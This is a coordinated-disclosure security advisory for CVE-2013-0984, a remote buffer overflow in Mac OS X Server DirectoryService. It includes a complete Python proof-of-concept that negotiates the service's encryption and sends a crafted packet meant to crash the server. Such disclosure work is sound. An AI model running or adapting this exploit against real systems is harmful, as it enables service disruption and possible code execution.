CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:M/Au:N/C:C/I:C/A:C
EPSS
Percentile
92.4%
**Title:**Mac OSX Server DirectoryService buffer overflow
**Advisory ID:**CORE-2013-0103
**Date published:**2013-06-04
**Date of last update:**2013-06-04
**Vendors contacted:**Apple
**Release mode:**Coordinated release
**Class:**Buffer overflow [CWE-119]
**Impact:**Code execution
**Remotely Exploitable:**Yes
**Locally Exploitable:**No
CVE Name:CVE-2013-0984
A memory corruption vulnerability was found in Mac OSX Directory Service. By sending a maliciously crafted message, a remote attacker could cause the directory server to terminate or execute arbitrary code with system privileges. The issue existed in the directory server’s handling of messages from the network.
This vulnerability was discovered and researched by Nicolas Economou. The publication of this advisory was coordinated by Fernando Miranda.
The bug is located in the function DSTCPEndpoint::AllocFromProxyStruct
from DSTCPEndpoint.cpp
[1]. An attacker can control both the value of inProxyDataMsg->fDataSize
and the data that will be copied. Thus, by sending a huge amount of data and a small buffer size, the service will crash trying to access an unmapped memory block.
Before running the PoC, make sure you meet the following prerequisites:
from Crypto.Cipher import AES import socket import struct import time def send_packet(sock, data): packet = "" packet += "DSPX" packet += struct.pack(">I", len(data)) packet += data sock.send(packet) def get_crypted_data(shared_key, data): cipher = AES.new(shared_key, AES.MODE_CBC, "\x00" * 16) crypted_data = cipher.encrypt(data) return crypted_data def attack(ip, port): try: p = socket.socket() p.connect((ip, port)) except Exception, e: print e return data = "" data += "DHN2" data += "\x00" * 63 + "\x02" # Key that generates a DERIVED KEY, identical to the one received. # Packet 1 print ("\nSending my public key ...") send_packet(p, data) resp = p.recv(65536) # Key sent by server. key_sent = resp[8: len(resp) - 1] server_key = "" # Flip the number. for i in range(len(key_sent) - 1, -1, -1): server_key += key_sent[i] # String to (a huge) number conversion. big_number = "" for c in server_key: big_number += "%.2x" % ord(c) big_number = int(big_number, 16) prime = 2 ** 128 # Obtaining the SHARED KEY (To be use for AES encryption). derived_key = pow(big_number, 1, prime) magic_number = derived_key derived_key_string = "" # Transform key into a string. while magic_number != 0: resto = magic_number % 256 magic_number /= 256 derived_key_string += struct.pack("B", resto)[0] print "shared key: %s" % repr(derived_key_string) # Handshake. print "Sending the Handshaking" data = "A" * 4 + ("\x0c" * 12) crypted_data = get_crypted_data(derived_key_string, data) send_packet(p, crypted_data) resp = p.recv(65536) data = "" data += "A" * 0x1b data += "\x02" data += struct.pack("<I", 0x10000000) # Evil value. data += struct.pack("<I", 0x100) # Value to be used by the last patched version. data += "A" * ( 0x34 - len(data) ) data += struct.pack(">I", 0x1172 + 1) # Operation code. data += struct.pack(">I", 0x99999999) data += struct.pack(">I", 0x80808080) data += struct.pack(">I", 0x81818181) data += struct.pack(">I", 0x66666666) data += "B" * (0xe0 - len( data)) # Bypass in previous Mac OSX versions ( Integer underflow -> ( ( 0xe0 + 0x10 ) - 0x100 ) data += "\x00" * 16 crypted_data = get_crypted_data(derived_key_string, data) # TRIGGER print ( "Sending the evil packet" ) send_packet(p, crypted_data) p.settimeout(10) try: p.recv(65536) except Exception, e: print e p.close() try: print ( "\nwaiting 10 seconds for check ..." ) time.sleep(10) p = socket.socket() p.settimeout(10) p.connect(( ip, port )) except Exception: print ( "\nThe attack was successful !\n" ) return print ( "\nThe attack wasn't successful\n" ) return ip = "192.168.100.1" port = 625 attack(ip, port)
[1] <http://opensource.apple.com/source/DirectoryService/DirectoryService-621/Proxy/DSTCPEndpoint.cpp>
[2] <https://www.dlitz.net/software/pycrypto/>
[3] <http://support.apple.com/kb/HT5501> - DirectoryService
[4] <https://appleseed.apple.com>
CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: www.coresecurity.com/core-labs.
Core Security enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.
Core Security’s software solutions build on over a decade of trusted research and leading-edge threat expertise from the company’s Security Consulting Services, CoreLabs and Engineering groups.
The contents of this advisory are copyright © 2012 Core Security and © 2012 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: <http://creativecommons.org/licenses/by-nc-sa/3.0/us/>